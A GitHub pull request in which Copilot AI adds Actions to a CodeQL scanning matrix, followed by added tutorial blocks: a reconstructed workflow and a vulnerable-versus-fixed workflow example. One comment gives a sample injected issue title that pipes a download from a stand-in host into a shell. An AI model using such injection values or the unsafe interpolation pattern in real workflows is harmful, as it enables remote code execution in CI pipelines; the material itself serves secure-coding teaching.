
Conversation


Copilot AI commented Jan 7, 2026

Adds 'actions' to the CodeQL language matrix to scan GitHub Actions workflow YAML files for security vulnerabilities.

Changes

  • Updated .github/workflows/codeql.yml to include 'actions' in the language matrix alongside 'go' and 'javascript'

Impact

CodeQL will now detect security issues in workflow files including:

  • Code injection vulnerabilities
  • Unpinned actions
  • Missing permissions
  • Artifact/cache poisoning
  • Secret exposure

Resolves security finding: https://security-findings.githubapp.com/finding?id=R2l0SHViSXNzdWVUeXBlOjI4MDkwNQ==&tab=vulnerabilities

Original prompt

Please update the CodeQL Actions workflow to also analyze actions. When you write the PR description, please note that this will resolve this security finding: https://security-findings.githubapp.com/finding?id=R2l0SHViSXNzdWVUeXBlOjI4MDkwNQ==&tab=vulnerabilities
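The PR only says that 'actions' was added to the matrix next to 'go' and 'javascript'; the repository's actual .github/workflows/codeql.yml is not shown on this page. The following is an added, reconstructed workflow (not the project's file) that shows what such a matrix looks like using the codeql-action `include:` form with an explicit build mode per language. Everything other than the three language names is an assumption: the trigger branches, the schedule, the permissions block and the `build-mode` values are the ones from the standard CodeQL starter workflow.

```yaml
# Added example, not the repository's own codeql.yml.
# 'actions' is analysed as its own CodeQL language: the extractor reads the
# workflow YAML under .github/workflows and action metadata files, so it
# needs no build step and is given build-mode: none.
name: "CodeQL"

on:
  push:
    branches: [ "main" ]          # assumption: default branch is main
  pull_request:
    branches: [ "main" ]
  schedule:
    - cron: "0 0 * * 1"           # assumption: weekly run

jobs:
  analyze:
    name: Analyze (${{ matrix.language }})
    runs-on: ubuntu-latest
    permissions:
      security-events: write      # upload SARIF results to code scanning
      packages: read              # fetch CodeQL query packs
      actions: read               # needed on private repos to read run data
      contents: read
    strategy:
      fail-fast: false            # one language failing must not hide the others
      matrix:
        include:
          - language: actions     # the language this PR adds
            build-mode: none
          - language: go
            build-mode: autobuild
          - language: javascript  # also accepts "javascript-typescript"
            build-mode: none
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Initialize CodeQL
        uses: github/codeql-action/init@v3
        with:
          languages: ${{ matrix.language }}
          build-mode: ${{ matrix.build-mode }}

      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v3
        with:
          # One category per language so results from the three matrix legs
          # are kept apart on the code scanning page instead of overwriting
          # each other.
          category: "/language:${{ matrix.language }}"
```

If the repository's file uses the older flat list form (`language: [ 'actions', 'go', 'javascript' ]`) instead of `include:`, the same change applies: appending 'actions' to that list is sufficient, since the Actions extractor does not need a build mode.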
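The PR description lists the classes of finding the new language enables (code injection, missing permissions, unpinned actions, and so on) without showing one. Below is an added illustration, not code from this repository, of a workflow that the Actions queries would report and of the corrected form side by side. The `issues: opened` trigger, the job names and the `echo` payload are constructed for the example.

```yaml
# Added illustration, not part of the project being scanned.
# Both jobs do the same thing; only the first one is reportable.
name: "Issue triage (illustration)"

on:
  issues:
    types: [opened]

# Deliberately NO top-level permissions block: the "unsafe" job below
# therefore runs with the repository's default token scope, which the
# missing-permissions query reports.

jobs:
  # Reportable: ${{ }} expressions are expanded into the script text BEFORE
  # bash runs it. github.event.issue.title is attacker-controlled, so a title
  # such as  x"; curl https://example.invalid/x | sh; echo "  becomes part of
  # the command. This is the "code injection" class listed in the PR.
  echo-title-unsafe:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"

  # Corrected: the untrusted value is bound to an environment variable and
  # the script references it as $TITLE. bash then treats the contents as data
  # (word-splitting aside, nothing in it is parsed as a command), and the job
  # states the least privilege it needs.
  echo-title-safe:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - env:
          TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $TITLE"
```

The same pattern covers the other untrusted event fields (pull request titles and bodies, branch names, commit messages, comment bodies): never place them inside `run:` via `${{ }}`; route them through `env:` or pass them as inputs to an action. Pinning third-party actions to a full commit SHA rather than a mutable tag addresses the "unpinned actions" item from the list above.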



Copilot AI self-assigned this Jan 7, 2026
Co-authored-by: eaftan <4733401+eaftan@users.noreply.github.com>
Copilot AI changed the title from "[WIP] Update CodeQL Actions workflow for action analysis" to "Enable CodeQL analysis for GitHub Actions workflows" Jan 8, 2026
Copilot AI requested a review from eaftan January 8, 2026 00:04
@eaftan eaftan marked this pull request as ready for review January 8, 2026 00:11
@eaftan eaftan merged commit c5c3406 into main Jan 8, 2026
@eaftan eaftan deleted the copilot/update-codeql-actions-workflow branch January 8, 2026 00:11